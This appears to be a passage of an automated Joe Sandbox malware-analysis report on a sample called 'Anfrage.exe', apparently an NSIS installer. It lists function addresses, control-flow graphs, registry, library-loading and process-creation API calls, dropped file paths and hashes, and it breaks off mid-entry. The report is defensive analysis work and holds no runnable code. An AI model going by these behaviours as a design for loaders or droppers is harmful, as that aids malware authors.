                                                                          control_flow_graph 802 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 809 40295e-40296d 802->809 810 40241f-402427 802->810 812 402437-40243a 810->812 813 402429-402436 call 402ace lstrlenA 810->813 814 40243c-40244d call 402aac 812->814 815 40244e-402451 812->815 813->812 814->815 819 402462-402476 RegSetValueExA 815->819 820 402453-40245d call 402f33 815->820 824 402478 819->824 825 40247b-402555 RegCloseKey 819->825 820->819 824->825 825->809 827 402729-402730 825->827 827->809
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp
                                                                          • API String ID: 1356686001-654820475
                                                                          • Opcode ID: 16c11ee55e493c1f4cb55922a7a265c15d1edf48fbcc260bb9481044d91f603c
                                                                          • Instruction ID: 78945337bfecb372f974009004526856e4df2419c5d7c36b02de55c30b310c87
                                                                          • Opcode Fuzzy Hash: 16c11ee55e493c1f4cb55922a7a265c15d1edf48fbcc260bb9481044d91f603c
                                                                          • Instruction Fuzzy Hash: 842162B1E00208BEEB10EFA4DE49EAF7678EB54358F20403AF545B61D0C6B94D419B68
                                                                          Function 00401FFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 768 401fff-40200b 769 402011-402027 call 402ace * 2 768->769 770 4020c6-4020c8 768->770 781 402036-402044 LoadLibraryExA 769->781 782 402029-402034 GetModuleHandleA 769->782 771 402233-402238 call 401423 770->771 777 402729-402730 771->777 778 40295e-40296d 771->778 777->778 784 402046-402053 GetProcAddress 781->784 785 4020bf-4020c1 781->785 782->781 782->784 786 402092-402097 call 404fdc 784->786 787 402055-40205b 784->787 785->771 792 40209c-40209f 786->792 788 402074-40208b call 100016bd 787->788 789 40205d-402069 call 401423 787->789 794 40208d-402090 788->794 789->792 800 40206b-402072 789->800 792->778 795 4020a5-4020ad call 4036e3 792->795 794->792 795->778 799 4020b3-4020ba FreeLibrary 795->799 799->778 800->792
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
                                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
                                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,755723A0), ref: 00405038
                                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID: xZf
                                                                          • API String ID: 2987980305-1093046601
                                                                          • Opcode ID: 180a3081fb3f78eb91f00a12e3d21899e8b163c30cc106c56dc37463dfcc7d01
                                                                          • Instruction ID: b783eae22080e2a76f4456b755c5680fa053b08e058d045f217a77597ec219f0
                                                                          • Opcode Fuzzy Hash: 180a3081fb3f78eb91f00a12e3d21899e8b163c30cc106c56dc37463dfcc7d01
                                                                          • Instruction Fuzzy Hash: 0F21C971A00225E7DB307FA48F49A5E7A746B44354F24413BF701B22D1DBBE4A42D66E
                                                                          Function 00405A65 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 828 405a65-405a6f 829 405a70-405a9b GetTickCount GetTempFileNameA 828->829 830 405aaa-405aac 829->830 831 405a9d-405a9f 829->831 833 405aa4-405aa7 830->833 831->829 832 405aa1 831->832 832->833
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405A79
                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A93
                                                                          Strings
                                                                          • nsa, xrefs: 00405A70
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A68
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 00405A65
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-1454429881
                                                                          • Opcode ID: 245b3c25697a366b20d072f4ae6f3df15c900acea65bebff5d6a318f0eee9b10
                                                                          • Instruction ID: 72edad6ec601b3e5bedbe0a956b09e0e85e9d1f351c5a8d1d7ddacf5062ef271
                                                                          • Opcode Fuzzy Hash: 245b3c25697a366b20d072f4ae6f3df15c900acea65bebff5d6a318f0eee9b10
                                                                          • Instruction Fuzzy Hash: DBF082363046187BDB108F55ED44B9B7B9CDFA1760F10803BFA44DA180D6B599548B58
                                                                          Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 834 402b0e-402b37 RegOpenKeyExA 835 402ba2-402ba6 834->835 836 402b39-402b44 834->836 837 402b5f-402b6f RegEnumKeyA 836->837 838 402b71-402b83 RegCloseKey call 40615c 837->838 839 402b46-402b49 837->839 847 402b85-402b94 838->847 848 402ba9-402baf 838->848 841 402b96-402b99 RegCloseKey 839->841 842 402b4b-402b5d call 402b0e 839->842 845 402b9f-402ba1 841->845 842->837 842->838 845->835 847->835 848->845 849 402bb1-402bbf RegDeleteKeyA 848->849 849->845 851 402bc1 849->851 851->835
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402B2F
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: ce3d45171df20cd5368556db4e0df27da4ec55921f16075ab1a00bf066d588a4
                                                                          • Instruction ID: 01bd3f518095735bd7fc58530e3e97865138d1262df332b424d450b53e5153fe
                                                                          • Opcode Fuzzy Hash: ce3d45171df20cd5368556db4e0df27da4ec55921f16075ab1a00bf066d588a4
                                                                          • Instruction Fuzzy Hash: 83117F31500108FFDF11AF90DE89EAB3B7DFB14345B00403AF905B11A0D7B8AE55AB68
                                                                          Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                            • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                          • String ID:
                                                                          • API String ID: 1791698881-3916222277
                                                                          • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                          • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                          • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                          • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                          Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(?,?,0042BC70,?,0040593A,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DC
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058E1
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058F5
                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                            • Part of subcall function 004054A2: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054E5
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic,00000000,00000000,000000F0), ref: 0040163C
                                                                          Strings
                                                                          • C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic, xrefs: 00401631
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic
                                                                          • API String ID: 1892508949-3139010620
                                                                          • Opcode ID: 41430e8041f5b825a25f6f7f5196f7741ab1efb3ce46360c30da8e6aa749b7db
                                                                          • Instruction ID: 816b54ed5d655ae39ec9af7653b37b3cb045aad08be9d120fc9ab2aeee17589e
                                                                          • Opcode Fuzzy Hash: 41430e8041f5b825a25f6f7f5196f7741ab1efb3ce46360c30da8e6aa749b7db
                                                                          • Instruction Fuzzy Hash: 4A110431608142EBDB317BB54D409BF2AB0DE96324B28493FE4D1B22E2D63D4942663E
                                                                          Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00404F7F
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0
                                                                            • Part of subcall function 00403FF4: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404006
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 08716edfc016174e1d95566f9c20dbce6f1779ae15c64c490cb603040d3fbc74
                                                                          • Instruction ID: 957b128ff8c1be49c7c43d2eec533a56ef4d4953328fce41794b465c1d4f4089
                                                                          • Opcode Fuzzy Hash: 08716edfc016174e1d95566f9c20dbce6f1779ae15c64c490cb603040d3fbc74
                                                                          • Instruction Fuzzy Hash: C80184B160020AAFDF20AF51DD80A5B3B66EBC4755F15413BFF00751D1C77D8C62966A
                                                                          Function 00405554 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C070,Error launching installer), ref: 0040557D
                                                                          • CloseHandle.KERNEL32(?), ref: 0040558A
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405567
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: 4fc3f2634484a51afe99368b6ee5adae76d461d8ba1d0850051e12a9b99b56ab
                                                                          • Instruction ID: 7a3dc1fb8a2ad91d62cd378edef27adb0088bf0f4d8ddc25e60ef95d811c5913
                                                                          • Opcode Fuzzy Hash: 4fc3f2634484a51afe99368b6ee5adae76d461d8ba1d0850051e12a9b99b56ab
                                                                          • Instruction Fuzzy Hash: 1AE04FB0600209BFEB109FA0ED45F7F77ACE700208F408531BD00F2150D77499088A7C
                                                                          Function 004024F5 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseOpenValue
                                                                          • String ID:
                                                                          • API String ID: 167947723-0
                                                                          • Opcode ID: 8c59f9b8c0256cbe9bd71fe7ee3f101d5ae56516e7ddf643f02568347a4a43af
                                                                          • Instruction ID: 2b577d6a6ed12fdd73b92825448b087f6304f6a5da561ecb1c8b28b09130acc9
                                                                          • Opcode Fuzzy Hash: 8c59f9b8c0256cbe9bd71fe7ee3f101d5ae56516e7ddf643f02568347a4a43af
                                                                          • Instruction Fuzzy Hash: EC01DF71A00201EFE7119F65AE88ABF7A7CDF40394F20003FF045A61C0D6B84A459669
                                                                          Function 00405CAA Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(80000002,00405EEF,00000000,00000002,?,00000002,?,?,00405EEF,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405CD3
                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00405EEF,?,00405EEF), ref: 00405CF4
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00405D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: 736db648b4ac55722d45c6321a86d011e73f53958cb133121ff9030ed915e9ad
                                                                          • Instruction ID: fa75aaf4fea41e3e7414327fe65dbec21031f90634d69430c1a7616152fbf627
                                                                          • Opcode Fuzzy Hash: 736db648b4ac55722d45c6321a86d011e73f53958cb133121ff9030ed915e9ad
                                                                          • Instruction Fuzzy Hash: 35015E7114020AEFDF118F64ED48EDB7FACEF14354F00403AF94596160D235D964CBA5
                                                                          Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000), ref: 100028A7
                                                                          • GetLastError.KERNEL32 ref: 100029AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID:
                                                                          • API String ID: 2976181284-0
                                                                          • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                          • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                          • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                          • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                          Function 00402483 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,0000059F,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B3
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nskF5B7.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
